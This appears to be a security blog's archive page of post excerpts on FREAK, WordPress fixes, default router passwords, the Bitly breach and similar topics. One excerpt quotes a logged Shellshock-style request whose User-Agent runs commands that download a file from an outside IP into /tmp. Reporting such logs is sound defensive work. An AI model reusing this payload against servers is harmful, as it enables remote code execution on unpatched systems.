According to some online sources, PORN is what uses around 30% of the Internet’s bandwidth. Why do I care about this? Because the top searches in my news portal IT Security News (www.itsecuritynews.info) are: nude videos, porn and naked pictures of celebrities. I guess we are living in a very … lonely world. This is also how […]
I read very often about vulnerabilities and companies that got hacked. Many times, the reason for which they got hacked was because some recommendation issued by some smart people (read: security minded people) are ignored. But why are they ignored? I found some articles where several explanations are given for what is called “information avoidance“. […]
One of my HTTP servers hosted on an Amazon EC2 receives regularly strange requests like these: One such request looks like this: GET /cgi-bin/php5 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; […]
UPDATE on the FREAK vulnerability in SSL: it affects not only Android and iOS but all Windows versions too. I wrote about the new SSL vulnerability called FREAK – Factoring RSA Export Keys – affects around 36% of all sites trusted by browsers and around 10% of the Alexa top one million domains, according to […]
After Heartbleed, a new security vulnerability in SSL is making headlines and producing again headaches for security experts. As any good and mind blowing (for most people) vulnerability, it has a nice name – FREAK, a CVE number – CVE-2015-0204 and a dedicated website https://freakattack.com/ . FREAK – Factoring RSA Export Keys – affects around […]
Heise created a portal for companies to assess their IT security. Details can be found here: https://www.heise-consulter.de/ You don’t have to register to take part of the survey which assesses your company’s security. If you want anonymity, check this page. It is important to mention who sponsored the initiative: Sophos, Baramundi, GateProtect, […]
All my blogs use WordPress. Why WordPress ? Because it is customizable and I can tweak it in any way I want… Well, almost… But from time to time there is the need to update it. Yesterday the update 4.0.1 was release which fixes important security bugs: Three cross-site scripting issues that a contributor or author […]
Useless to write again about changing default passwords? Think again… I just bought two brand-new TP-Link WiFi Range Extenders, models WA860RE and WA854RE. Latest version, latest firmware. Both come with default username and password: admin. It is written on their back… Once you login, you will go through as wizard which configures the device. But, it […]
No matter which source for statistics you take, all agree that the most used browsers are Chrome, Firefox and Internet Explorer. There have been many studies and tests done to find out which is the most secure of them. However, the tests are able only to show how each browser is matching a set of […]
Link shortening service Bitly late Thursday announced it has suffered a data breach, and urged all users to reset their credentials. Bitly’s CEO wrote in the blogpost that they have “reasons to believe that Bitly account credentials have been compromised; specifically, users’ email addresses, encrypted passwords, API keys and OAuth tokens”. This is really bad because it […]
You must be logged in to post a comment.